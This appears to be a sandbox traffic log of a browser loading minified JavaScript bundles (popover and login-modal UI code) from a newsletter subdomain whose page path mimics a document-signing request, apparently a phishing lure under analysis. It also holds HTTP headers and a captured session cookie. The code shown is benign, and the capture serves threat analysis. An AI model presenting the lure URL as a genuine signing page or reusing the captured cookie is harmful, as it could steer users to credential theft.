                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 61 62 73 6f 6c 75 74 65 20 6c 65 66 74 2d 30 20 74 6f 70 2d 30 20 68 2d 66 75 6c 6c 20 77 2d 66 75 6c 6c 20 72 6f 75 6e 64 65 64 2d 66 75 6c 6c 20 62 67 2d 62 6c 61 63 6b 20 6f 70 61 63 69 74 79 2d 31 30 22 7d 29 2c 62 2e 6a 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 72 6f 75 6e 64 65 64 2d 66 75 6c 6c 20 62 67 2d 62 6c 61 63 6b 20 70 2d 32 20 74 65 78 74 2d 77 68 69 74 65 22 2c 73 74 79 6c 65 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 50 2c 63 6f 6c 6f 72 3a 67 7d 2c 63 68 69 6c 64 72 65 6e 3a 74 7d 29 5d 7d 29 3a 6e 75 6c 6c 2c 68 74 3d 28 7b 70 75 62 6c 69 63 61 74 69 6f 6e 3a 65 2c 62 67 43 6f 6c 6f 72 3a 74 2c 66 69 6c 6c 43 6f 6c 6f 72 3a 63 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 74
                                                                                                                                            Data Ascii: ",{className:"absolute left-0 top-0 h-full w-full rounded-full bg-black opacity-10"}),b.jsx("div",{className:"rounded-full bg-black p-2 text-white",style:{backgroundColor:P,color:g},children:t})]}):null,ht=({publication:e,bgColor:t,fillColor:c})=>{const{t
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 54 2e 61 72 69 61 4c 61 62 65 6c 2c 62 67 43 6f 6c 6f 72 3a 74 2c 66 69 6c 6c 43 6f 6c 6f 72 3a 63 7d 2c 54 2e 61 72 69 61 4c 61 62 65 6c 29 29 7d 29 7d 3b 76 61 72 20 47 65 3d 28 65 3d 3e 28 65 5b 65 2e 4f 70 65 6e 3d 30 5d 3d 22 4f 70 65 6e 22 2c 65 5b 65 2e 43 6c 6f 73 65 64 3d 31 5d 3d 22 43 6c 6f 73 65 64 22 2c 65 29 29 28 47 65 7c 7c 7b 7d 29 2c 48 65 3d 28 65 3d 3e 28 65 5b 65 2e 54 6f 67 67 6c 65 50 6f 70 6f 76 65 72 3d 30 5d 3d 22 54 6f 67 67 6c 65 50 6f 70 6f 76 65 72 22 2c 65 5b 65 2e 43 6c 6f 73 65 50 6f 70 6f 76 65 72 3d 31 5d 3d 22 43 6c 6f 73 65 50 6f 70 6f 76 65 72 22 2c 65 5b 65 2e 53 65 74 42 75 74 74 6f 6e 3d 32 5d 3d 22 53 65 74 42 75 74 74 6f 6e 22 2c 65 5b 65 2e 53 65 74 42 75 74 74 6f 6e 49 64 3d 33 5d 3d 22 53 65 74 42 75 74 74 6f
                                                                                                                                            Data Ascii: T.ariaLabel,bgColor:t,fillColor:c},T.ariaLabel))})};var Ge=(e=>(e[e.Open=0]="Open",e[e.Closed=1]="Closed",e))(Ge||{}),He=(e=>(e[e.TogglePopover=0]="TogglePopover",e[e.ClosePopover=1]="ClosePopover",e[e.SetButton=2]="SetButton",e[e.SetButtonId=3]="SetButto
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 65 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 6e 75 6c 6c 29 3b 74 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 50 6f 70 6f 76 65 72 50 61 6e 65 6c 43 6f 6e 74 65 78 74 22 3b 66 75 6e 63 74 69 6f 6e 20 55 65 28 29 7b 72 65 74 75 72 6e 20 61 2e 75 73 65 43 6f 6e 74 65 78 74 28 74 65 29 7d 66 75 6e 63 74 69 6f 6e 20 57 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 48 28 74 2e 74 79 70 65 2c 7a 65 2c 65 2c 74 29 7d 6c 65 74 20 5a 65 3d 22 64 69 76 22 3b 66 75 6e 63 74 69 6f 6e 20 4b 65 28 65 2c 74 29 7b 76 61 72 20 63 3b 6c 65 74 7b 5f 5f 64 65 6d 6f 4d 6f 64 65 3a 50 3d 21 31 2c 2e 2e 2e 67 7d 3d 65 2c 6c 3d 61 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 2c 72 3d 55 28 74 2c 54 65 28 75 3d 3e 7b 6c 2e 63 75 72 72 65 6e 74 3d 75 7d 29 29 2c 66 3d 61 2e 75 73
                                                                                                                                            Data Ascii: e=a.createContext(null);te.displayName="PopoverPanelContext";function Ue(){return a.useContext(te)}function We(e,t){return H(t.type,ze,e,t)}let Ze="div";function Ke(e,t){var c;let{__demoMode:P=!1,...g}=e,l=a.useRef(null),r=U(t,Te(u=>{l.current=u})),f=a.us
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 7c 7c 28 56 3d 28 4d 3d 6b 2e 63 75 72 72 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 4d 2e 63 6f 6e 74 61 69 6e 73 29 21 3d 6e 75 6c 6c 26 26 56 2e 63 61 6c 6c 28 4d 2c 75 2e 74 61 72 67 65 74 29 7c 7c 28 4a 3d 28 4b 3d 79 2e 63 75 72 72 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 4b 2e 63 6f 6e 74 61 69 6e 73 29 21 3d 6e 75 6c 6c 26 26 4a 2e 63 61 6c 6c 28 4b 2c 75 2e 74 61 72 67 65 74 29 7c 7c 73 28 7b 74 79 70 65 3a 31 7d 29 29 29 7d 2c 21 30 29 2c 4c 65 28 6f 2e 72 65 73 6f 6c 76 65 43 6f 6e 74 61 69 6e 65 72 73 2c 28 75 2c 4d 29 3d 3e 7b 73 28 7b 74 79 70 65 3a 31 7d 29 2c 46 65 28 4d 2c 5f 65 2e 4c 6f 6f 73 65 29 7c 7c 28 75 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 69 3f 2e 66 6f 63 75 73 28 29 29 7d 2c 68 3d 3d 3d
                                                                                                                                            Data Ascii: ||(V=(M=k.current)==null?void 0:M.contains)!=null&&V.call(M,u.target)||(J=(K=y.current)==null?void 0:K.contains)!=null&&J.call(K,u.target)||s({type:1})))},!0),Le(o.resolveContainers,(u,M)=>{s({type:1}),Fe(M,_e.Loose)||(u.preventDefault(),i?.focus())},h===
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 20 61 20 3c 50 6f 70 6f 76 65 72 2e 42 75 74 74 6f 6e 20 2f 3e 20 62 75 74 20 6f 6e 6c 79 20 31 20 3c 50 6f 70 6f 76 65 72 2e 42 75 74 74 6f 6e 20 2f 3e 20 69 73 20 73 75 70 70 6f 72 74 65 64 2e 22 29 2c 6f 26 26 72 28 7b 74 79 70 65 3a 32 2c 62 75 74 74 6f 6e 3a 6f 7d 29 7d 29 2c 79 3d 55 28 76 2c 74 29 2c 73 3d 61 65 28 76 29 2c 6d 3d 49 28 6f 3d 3e 7b 76 61 72 20 64 2c 45 2c 78 3b 69 66 28 6e 29 7b 69 66 28 6c 2e 70 6f 70 6f 76 65 72 53 74 61 74 65 3d 3d 3d 31 29 72 65 74 75 72 6e 3b 73 77 69 74 63 68 28 6f 2e 6b 65 79 29 7b 63 61 73 65 20 41 2e 53 70 61 63 65 3a 63 61 73 65 20 41 2e 45 6e 74 65 72 3a 6f 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 28 45 3d 28 64 3d 6f 2e 74 61 72 67 65 74 29 2e 63 6c 69 63 6b 29 3d 3d 6e 75 6c 6c 7c 7c 45 2e
                                                                                                                                            Data Ascii: a <Popover.Button /> but only 1 <Popover.Button /> is supported."),o&&r({type:2,button:o})}),y=U(v,t),s=ae(v),m=I(o=>{var d,E,x;if(n){if(l.popoverState===1)return;switch(o.key){case A.Space:case A.Enter:o.preventDefault(),(E=(d=o.target).click)==null||E.
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 28 75 65 28 29 2e 66 69 6c 74 65 72 28 45 3d 3e 45 2e 64 61 74 61 73 65 74 2e 68 65 61 64 6c 65 73 73 75 69 46 6f 63 75 73 47 75 61 72 64 21 3d 3d 22 74 72 75 65 22 29 2c 48 28 77 2e 63 75 72 72 65 6e 74 2c 7b 5b 44 2e 46 6f 72 77 61 72 64 73 5d 3a 52 2e 4e 65 78 74 2c 5b 44 2e 42 61 63 6b 77 61 72 64 73 5d 3a 52 2e 50 72 65 76 69 6f 75 73 7d 29 2c 7b 72 65 6c 61 74 69 76 65 54 6f 3a 6c 2e 62 75 74 74 6f 6e 7d 29 7d 64 28 29 7d 29 3b 72 65 74 75 72 6e 20 24 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 24 2e 46 72 61 67 6d 65 6e 74 2c 6e 75 6c 6c 2c 71 28 7b 6f 75 72 50 72 6f 70 73 3a 70 2c 74 68 65 69 72 50 72 6f 70 73 3a 67 2c 73 6c 6f 74 3a 6a 2c 64 65 66 61 75 6c 74 54 61 67 3a 59 65 2c 6e 61 6d 65 3a 22 50 6f 70 6f 76 65 72 2e 42 75 74 74 6f 6e 22 7d
                                                                                                                                            Data Ascii: (ue().filter(E=>E.dataset.headlessuiFocusGuard!=="true"),H(w.current,{[D.Forwards]:R.Next,[D.Backwards]:R.Previous}),{relativeTo:l.button})}d()});return $.createElement($.Fragment,null,q({ourProps:p,theirProps:g,slot:j,defaultTag:Ye,name:"Popover.Button"}


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            89192.168.2.1649814104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC840OUTGET /assets/index-DIU-Hrs1.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 536
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"218-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4164
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b1fd6342d8-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 63 36 31 31 66 34 39 2d 31 64 30 38 2d 35 62 33 35 2d 62 63 32 66 2d 35 35 66 33 62 64 34 36 31 32 37 30 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0c611f49-1d08-5b35-bc2f-55f3bd461270")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC78INData Raw: 6e 67 55 52 4c 3d 69 6e 64 65 78 2d 44 49 55 2d 48 72 73 31 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 30 63 36 31 31 66 34 39 2d 31 64 30 38 2d 35 62 33 35 2d 62 63 32 66 2d 35 35 66 33 62 64 34 36 31 32 37 30 0a
                                                                                                                                            Data Ascii: ngURL=index-DIU-Hrs1.js.map//# debugId=0c611f49-1d08-5b35-bc2f-55f3bd461270


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            90192.168.2.1649818104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC859OUTGET /assets/useSetLastViewedResource-BelRoKi6.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC913INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 9331
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"2473-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4164
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b1fcc880d0-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC456INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 37 32 38 62 30 31 36 2d 36 30 34 64 2d 35 62 30 62 2d 39 33 61 61 2d 35 33 34 31 34 31 61 62 64 34 66 61 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5728b016-604d-5b0b-93aa-534141abd4fa")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 72 74 7b 75 20 61 73 20 53 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 6f 61 73 74 2d 44 4b 34 32 75 46 30 37 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 63 20 61 73 20 4c 2c 4c 20 61 73 20 77 2c 75 20 61 73 20 6a 7d 66 72 6f 6d 22 2e 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 62 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 72 61 6e 73 6c 61 74 69 6f 6e 2d 43 66 4b 4a 41 6d 47 59 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 4c 20 61 73 20 54 7d 66 72 6f 6d 22 2e 2f 4c 6f 67 69 6e 57 69 74 68 50 61 73 73 77 6f 72 64 41 63 74 69 6f 6e 2d 54 56 4c 70 4a 61 4c 71 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 54 20 61 73 20 66 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 42 64 70 41 50 70 64 4e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 49 20 61
                                                                                                                                            Data Ascii: rt{u as S}from"./useToast-DK42uF07.js";import{c as L,L as w,u as j}from"./components-Oj2xMfGE.js";import{u as b}from"./useTranslation-CfKJAmGY.js";import{L as T}from"./LoginWithPasswordAction-TVLpJaLq.js";import{T as f}from"./index-BdpAPpdN.js";import{I a
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 29 7c 7c 22 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 62 6c 6f 63 6b 20 77 2d 66 75 6c 6c 20 66 6c 65 78 2d 5b 32 5d 20 62 6f 72 64 65 72 2d 6e 6f 6e 65 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 6c 67 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 74 65 78 74 2d 62 6c 61 63 6b 20 70 6c 61 63 65 68 6f 6c 64 65 72 3a 74 65 78 74 2d 6c 67 20 66 6f 63 75 73 3a 74 65 78 74 2d 6c 67 20 66 6f 63 75 73 3a 6f 75 74 6c 69 6e 65 2d 6e 6f 6e 65 22 2c 72 65 71 75 69 72 65 64 3a 21 30 7d 29 2c 65 2e 6a 73 78 28 22 62 75 74 74 6f 6e 22 2c 7b 74 79 70 65 3a 22 62 75 74 74 6f 6e 22 2c 6f 6e 43 6c 69 63 6b 3a 75 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 77 74 2d 62 75 74 74 6f 6e 2d 66 6f 6e 74 20 62 6c 6f 63 6b 20 68 2d 66 75 6c 6c 20 77 2d 66 75 6c 6c 20 66 6c 65 78
                                                                                                                                            Data Ascii: )||"",className:"block w-full flex-[2] border-none bg-transparent text-lg font-normal text-black placeholder:text-lg focus:text-lg focus:outline-none",required:!0}),e.jsx("button",{type:"button",onClick:u,className:"wt-button-font block h-full w-full flex
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 20 30 20 31 20 30 2d 31 2e 32 32 2d 2e 38 37 32 6c 2d 33 2e 32 33 36 20 34 2e 35 33 4c 39 2e 35 33 20 31 32 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 30 20 30 2d 31 2e 30 36 20 31 2e 30 36 6c 32 2e 32 35 20 32 2e 32 35 61 2e 37 35 2e 37 35 20 30 20 30 20 30 20 31 2e 31 34 2d 2e 30 39 34 6c 33 2e 37 35 2d 35 2e 32 35 5a 22 2c 63 6c 69 70 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 7d 29 29 7d 63 6f 6e 73 74 20 4b 3d 64 2e 66 6f 72 77 61 72 64 52 65 66 28 43 29 2c 52 3d 28 7b 69 73 4f 70 65 6e 3a 73 2c 6f 6e 43 6c 6f 73 65 3a 72 2c 63 68 69 6c 64 72 65 6e 3a 61 2c 74 69 74 6c 65 3a 74 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 6e 2c 70 75 62 6c 69 63 61 74 69 6f 6e 3a 6f 2c 61 6c 74 65 72 6e 61 74 69 76 65 41 63 74 69 6f 6e 3a 6d 7d 29 3d 3e 7b 63 6f 6e 73 74 20 69
                                                                                                                                            Data Ascii: 0 1 0-1.22-.872l-3.236 4.53L9.53 12.22a.75.75 0 0 0-1.06 1.06l2.25 2.25a.75.75 0 0 0 1.14-.094l3.75-5.25Z",clipRule:"evenodd"}))}const K=d.forwardRef(C),R=({isOpen:s,onClose:r,children:a,title:t,description:n,publication:o,alternativeAction:m})=>{const i
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 69 6c 64 72 65 6e 3a 5b 65 2e 6a 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 61 62 73 6f 6c 75 74 65 20 72 69 67 68 74 2d 36 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 28 22 62 75 74 74 6f 6e 22 2c 7b 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 22 43 6c 6f 73 65 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 68 2d 36 20 77 2d 36 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 72 6f 75 6e 64 65 64 2d 77 74 20 74 72 61 6e 73 69 74 69 6f 6e 2d 61 6c 6c 20 68 6f 76 65 72 3a 62 67 2d 62 6c 61 63 6b 2f 35 22 2c 6f 6e 43 6c 69 63 6b 3a 72 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 28 76 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 68 2d 35 20 77 2d 35 20 73 74 72 6f 6b 65 2d 31 20 74 65 78 74 2d 67 72
                                                                                                                                            Data Ascii: ildren:[e.jsx("div",{className:"absolute right-6",children:e.jsx("button",{"aria-label":"Close",className:"flex h-6 w-6 items-center justify-center rounded-wt transition-all hover:bg-black/5",onClick:r,children:e.jsx(v,{className:"h-5 w-5 stroke-1 text-gr
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 73 28 66 2c 7b 61 73 3a 22 70 22 2c 73 69 7a 65 3a 22 78 73 22 2c 74 79 70 65 3a 22 62 6f 64 79 22 2c 74 68 65 6d 65 3a 22 64 65 66 61 75 6c 74 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 74 28 22 6c 6f 67 69 6e 2e 73 69 67 6e 5f 75 70 5f 6c 61 62 65 6c 22 29 2c 22 20 22 2c 65 2e 6a 73 78 28 77 2c 7b 74 6f 3a 22 2f 73 75 62 73 63 72 69 62 65 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 75 6e 64 65 72 6c 69 6e 65 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 28 66 2c 7b 61 73 3a 22 73 70 61 6e 22 2c 73 69 7a 65 3a 22 78 73 22 2c 74 79 70 65 3a 22 62 6f 64 79 22 2c 77 65 69 67 68 74 3a 22 62 6f 6c 64 22 2c 74 68 65 6d 65
                                                                                                                                            Data Ascii: sx("div",{className:"flex flex-col",children:e.jsxs(f,{as:"p",size:"xs",type:"body",theme:"default",children:[t("login.sign_up_label")," ",e.jsx(w,{to:"/subscribe",className:"underline",children:e.jsx(f,{as:"span",size:"xs",type:"body",weight:"bold",theme
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 64 72 65 6e 3a 65 2e 6a 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 69 78 65 64 20 69 6e 73 65 74 2d 30 20 62 6f 74 74 6f 6d 2d 30 20 6c 65 66 74 2d 30 20 7a 2d 32 30 20 62 67 2d 62 6c 61 63 6b 2f 36 30 22 7d 29 7d 29 2c 65 2e 6a 73 78 28 78 2e 43 68 69 6c 64 2c 7b 61 73 3a 64 2e 46 72 61 67 6d 65 6e 74 2c 65 6e 74 65 72 3a 22 65 61 73 65 2d 6f 75 74 20 64 75 72 61 74 69 6f 6e 2d 31 30 30 22 2c 65 6e 74 65 72 46 72 6f 6d 3a 22 74 72 61 6e 73 66 6f 72 6d 20 73 6d 3a 74 72 61 6e 73 6c 61 74 65 2d 79 2d 30 20 74 72 61 6e 73 6c 61 74 65 2d 79 2d 31 2f 32 20 6f 70 61 63 69 74 79 2d 30 22 2c 65 6e 74 65 72 54 6f 3a 22 74 72 61 6e 73 66 6f 72 6d 20 74 72 61 6e 73 6c 61 74 65 2d 79 2d 30 20 6f 70 61 63 69 74 79 2d 31 30 30 22 2c 6c 65 61 76
                                                                                                                                            Data Ascii: dren:e.jsx("div",{className:"fixed inset-0 bottom-0 left-0 z-20 bg-black/60"})}),e.jsx(x.Child,{as:d.Fragment,enter:"ease-out duration-100",enterFrom:"transform sm:translate-y-0 translate-y-1/2 opacity-0",enterTo:"transform translate-y-0 opacity-100",leav
